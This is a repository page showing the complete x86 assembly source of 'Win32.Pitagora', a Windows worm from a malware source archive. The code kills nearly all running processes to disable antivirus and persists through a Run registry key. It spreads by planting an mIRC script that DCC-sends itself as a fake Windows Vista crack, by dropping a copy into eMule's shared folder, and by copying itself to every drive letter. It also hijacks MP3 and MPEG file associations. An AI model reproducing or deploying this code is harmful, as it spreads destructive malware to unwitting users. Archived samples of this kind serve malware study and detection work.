ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 01:46:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
80ba9a9b08
MalwareSourceCode/Win32/Win32.Pitagora.asm

490 lines
13 KiB
NASM
Raw Normal View History

Add files via upload
2020-10-11 03:09:34 +00:00
;;; un piccolo worm in assembler ... (cazzuto ma non troppo :-))
.586
.model flat
;;;; API NECESSARIE ! ;;;;
extrn ExitProcess:PROC
extrn ShellAboutA:PROC
extrn CopyFileA:PROC
extrn GetCommandLineA:PROC
extrn lstrcpy:PROC
extrn lstrlen:PROC
extrn lstrcat:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn RegOpenKeyA:PROC
extrn RegSetValueExA:PROC
extrn RegSetValueA:PROC
extrn RegCloseKey:PROC
extrn RegQueryValueExA:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn CreateThread:PROC
extrn Sleep:PROC
extrn WriteFile:PROC
extrn CreateMutexA:PROC
extrn GetLastError:PROC
extrn CreateToolhelp32Snapshot:PROC
extrn Process32First:PROC
extrn Process32Next:PROC
extrn GetCurrentProcessId:PROC
extrn OpenProcess:PROC
extrn TerminateProcess:PROC
extrn lstrcmpi:PROC
;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Costanti ;;;;
MAX_PATH equ 260
HKEY_LOCAL_MACHINE equ 80000002h
HKEY_CURRENT_USER equ 80000001h
REG_SZ equ 1
OPEN_EXISTING equ 3
CREATE_NEW equ 1
CREATE_ALWAYS equ 2
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
FILE_SHARE_READ equ 1
FILE_SHARE_WRITE equ 2
ERROR_ALREADY_EXISTS equ 183
PROCESS_ALL_ACCESS equ 00000000h
;;;;;;;;;;;;;;;;;;
.data
;;;; Variabili e MsgS ;;;;
MyPath db 260 dup(?)
WinPATH db 260 dup(?)
SysPATH db 260 dup(?)
WormName1 db "\sys.exe",0
WormName2 db "\mon.exe",0
StartUpKey db "Software\Microsoft\Windows\CurrentVersion\Run", 0
CheckFile db "\Pitagora.teo",0
CheckFilePath db 260 dup(?)
KeyName db "SystemMonitor",0
Msg db "You have been infected by Pitagora !!! by WarGame !!!!",0
Titolo db "Is the war right ???? Think about this ...",0
HKey dd 00000000h
Tid dd 00000000h
CopyName db "C:\AVG-Antivirus.exe",0
MSG_Interno db "Anti Soviet and Anti American !!!",0
Drive db 'C'
MircPath db 260 dup(?)
MircKey db "Software\Microsoft\Windows\CurrentVersion\Uninstall\mIRC",0
MircKeyName db "UninstallString",0
EmuleKey db "Software\eMule",0
EmuleKeyName db "Install Path",0
EmuleWorm db "\Incoming\WINDOWS_VISTA_CRACK.exe",0
EmulePath db 260 dup (?)
BufLen dd 260
ScriptIni db "script.ini",0
MIRCWORM db "[Script]",0dh,0ah ,"n0=on 1:join:#: { if ( $nick == $me ) halt",0dh,0ah ,"n1=else /dcc send $nick WINDOWS_VISTA_CRACK_CHANGE_MY_EXSTENSION_TO_EXE_TO_GO.txt",0
MP3Key1 db "SOFTWARE\Classes\mp3file\shell\open\command",0
MP3Key2 db "SOFTWARE\Classes\mp3file\shell\play\command",0
MPEGKey1 db "SOFTWARE\Classes\mpegfile\shell\open\command",0
MPEGKey2 db "SOFTWARE\Classes\mpegfile\shell\play\command",0
FD dd 00000000h
Scritti dd 00000000h
OpenMe_Path db 260 dup(?)
OpenMe db "WINDOWS_VISTA_CRACK_CHANGE_MY_EXSTENSION_TO_EXE_TO_GO.txt",0
MUT db "WOOWOO",0
MSGPayLoad db "!!!! AH...AH...this is for Pitagora ... I am Italian and you? !!!!",0
;;;;;;;;;;;;;;;;;;;
Snap dd 00000000h
TH32CS_SNAPPROCESS EQU 00000002h
PROCESS_TERMINATE equ 00000001h
PROCESSENTRY32 struct
dwSize DD 0
cntUsage DD 0
th32ProcessID DD 0
th32DefaultHeapID DD 0
th32ModuleID DD 0
cntThreads DD 0
th32ParentProcessID DD 0
pcPriClassBase DD 0
dwFlags DD 0
szExeFile DB MAX_PATH DUP(0)
PROCESSENTRY32 ends
prentry PROCESSENTRY32 <>
MyID dd 00000000h
EX db "explorer.exe",0
p_RET dd 00000000h
;;;;;;;;;;;;;;;;;;;
.code
Pitagora:
Sono_Solo:
push offset MUT
push 00000001h
push 00000000h
call CreateMutexA
call GetLastError
cmp eax,ERROR_ALREADY_EXISTS
je Esci
Ottieni_path:
call GetCommandLineA
push eax
push offset MyPath
call lstrcpy
push offset MyPath
call lstrlen
xor ebx,ebx
mov [MyPath+eax-2],bh
push offset [MyPath+1]
push offset MyPath
call lstrcpy
Ottieni_path_OS:
push 260
push offset WinPATH
call GetWindowsDirectoryA
push offset WinPATH
push offset CheckFilePath
call lstrcpy
push 260
push offset SysPATH
call GetSystemDirectoryA
Crea_Path_Worms:
push offset WormName1
push offset WinPATH
call lstrcat
push offset WormName2
push offset SysPATH
call lstrcat
Anti_AntiVirus:
call FuckAV ; ... termina i processi non graditi ...
Controlla_Se_Infetto:
push offset CheckFile
push offset CheckFilePath
call lstrcat
push 00000000h
push 00000000h
push OPEN_EXISTING
push 00000000h
push FILE_SHARE_READ
push GENERIC_READ
push offset CheckFilePath
call CreateFileA
cmp eax,-1
jne Worming
push 00000000h
push 00000000h
push CREATE_NEW
push 00000000h
push FILE_SHARE_WRITE
push GENERIC_WRITE
push offset CheckFilePath
call CreateFileA
push eax
call CloseHandle
Copia_file:
push 00000000h
push offset WinPATH
push offset MyPath
call CopyFileA
push 00000000h
push offset SysPATH
push offset MyPath
call CopyFileA
StartupAutomatico:
push offset HKey
push offset StartUpKey
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
jne Esci
push offset SysPATH
call lstrlen
mov ebx,1
add eax,ebx
push eax
push offset SysPATH
push REG_SZ
push 00000000h
push offset KeyName
push HKey
call RegSetValueExA
push HKey
call RegCloseKey
Esci:
push 00000000h
push offset Msg
push offset Titolo
push 00000000h
call ShellAboutA
xor edx,edx
push edx
call ExitProcess
Worming:
push eax
call CloseHandle
INFETTA_MIRC:
push offset HKey
push offset MircKey
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
jne INFETTA_EMULE
push offset BufLen
push offset MircPath
push 00000000h
push 00000000h
push offset MircKeyName
push HKey
call RegQueryValueExA
cmp eax,0
jne INFETTA_EMULE
push HKey
call RegCloseKey
push offset [MircPath+1]
push offset [MircPath]
call lstrcpy
push offset MircPath
xor ecx,ecx
Fuck:
cmp byte ptr[MircPath+ecx],'"'
je OK
inc ecx
jmp Fuck
OK:
xor ebx,ebx
mov [MircPath+ecx],bh
xor ecx,ecx
Fuck2:
cmp byte ptr[MircPath+ecx],'.'
je OK2
inc ecx
jmp Fuck2
OK2:
xor ebx,ebx
mov [MircPath+ecx-4],bh
push offset MircPath
push offset OpenMe_Path
call lstrcpy
push offset OpenMe
push offset OpenMe_Path
call lstrcat
push offset ScriptIni
push offset MircPath
call lstrcat
push 00000000h
push 00000000h
push CREATE_ALWAYS
push 00000000h
push FILE_SHARE_WRITE
push GENERIC_WRITE
push offset MircPath
call CreateFileA
cmp eax,-1
je INFETTA_EMULE
mov FD,eax
push 00000000h
push offset Scritti
push offset MIRCWORM
call lstrlen
push eax
push offset MIRCWORM
push FD
call WriteFile
push FD
call CloseHandle
push offset MircPath
call lstrlen
push offset [MircPath+eax-11]
push offset MircPath
call lstrcpy
push 00000000h
push offset OpenMe_Path
push offset MyPath
call CopyFileA
INFETTA_EMULE:
push offset HKey
push offset EmuleKey
push HKEY_CURRENT_USER
call RegOpenKeyA
cmp eax,0
jne MP3_FUCKING
push offset BufLen
push offset EmulePath
push 00000000h
push 00000000h
push offset EmuleKeyName
push HKey
call RegQueryValueExA
cmp eax,0
jne MP3_FUCKING
push offset EmuleWorm
push offset EmulePath
call lstrcat
push 00000000h
push offset EmulePath
push offset MyPath
call CopyFileA
MP3_FUCKING:
push offset HKey
push offset MP3Key1
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
jne MPEG_FUCKING
push offset WinPATH
call lstrlen
push eax
push offset WinPATH
push REG_SZ
push 00000000h
push HKey
call RegSetValueA
push HKey
call RegCloseKey
push offset HKey
push offset MP3Key2
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
jne MPEG_FUCKING
push offset WinPATH
call lstrlen
push eax
push offset WinPATH
push REG_SZ
push 00000000h
push HKey
call RegSetValueA
push HKey
call RegCloseKey
MPEG_FUCKING:
push offset HKey
push offset MPEGKey1
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
jne Vai
push offset WinPATH
call lstrlen
push eax
push offset WinPATH
push REG_SZ
push 00000000h
push HKey
call RegSetValueA
push HKey
call RegCloseKey
push offset HKey
push offset MPEGKey2
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
jne Vai
push offset WinPATH
call lstrlen
push eax
push offset WinPATH
push REG_SZ
push 00000000h
push HKey
call RegSetValueA
push HKey
call RegCloseKey
Vai:
push offset Tid
push 00000000h
push 00000000h
push offset Copiati
push 00000000h
push 00000000h
call CreateThread
push offset Tid
push 00000000h
push 00000000h
push offset PayLoad
push 00000000h
push 00000000h
call CreateThread
Dormi:
push 186a0h
call Sleep
xor ecx,ecx
cmp ecx,0
je Dormi
;;;; Thread di autocopia ;;;;
Copiati PROC
Copia:
mov ch,'C'
mov Drive,ch
mov [CopyName+0],ch
xor ebx,ebx
Tutti_I_drives:
push 00000000h
push offset CopyName
push offset MyPath
call CopyFileA
push 4e20h
call Sleep
add Drive,1
mov ch,Drive
mov [CopyName+0],ch
cmp ch,'Z'+1
jne Tutti_I_drives
cmp ebx,0
je Copia
Copiati ENDP
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; PayLoad ;;;;
PayLoad PROC
Loop:
xor ecx,ecx
push 1200000
call Sleep
push 00000000h
push offset MSGPayLoad
push offset Titolo
push 00000000h
call ShellAboutA
cmp ecx,0
je Loop
PayLoad ENDP
;;;;;;;;;;;;;;;;;
FuckAV PROC
My_ID:
call GetCurrentProcessId
mov MyID,eax
Inializza:
push 00000000h
push TH32CS_SNAPPROCESS
call CreateToolhelp32Snapshot
cmp eax,-1
je Ritorna
mov Snap,eax
Primo:
push offset prentry
push Snap
mov prentry.dwSize,296
call Process32First
cmp eax,0
je Ritorna
Altri:
push offset prentry
push Snap
mov prentry.dwSize,296
call Process32Next
mov p_RET,eax
Controlla_se_explorer:
push offset prentry.szExeFile
push offset EX
call lstrcmpi
cmp eax,0
je Ancora
Controlla_id:
mov edx,MyID
cmp edx,prentry.th32ProcessID
je Ancora
Termina:
push dword ptr[prentry.th32ProcessID]
push 00000000h
push PROCESS_TERMINATE
call OpenProcess
push 00000000h
push eax
call TerminateProcess
Ancora:
cmp p_RET,0
jne Altri
Ritorna:
ret
FuckAV ENDP
;;;;;;;;;;;;;;;;;
end Pitagora
Reference in New Issue Copy Permalink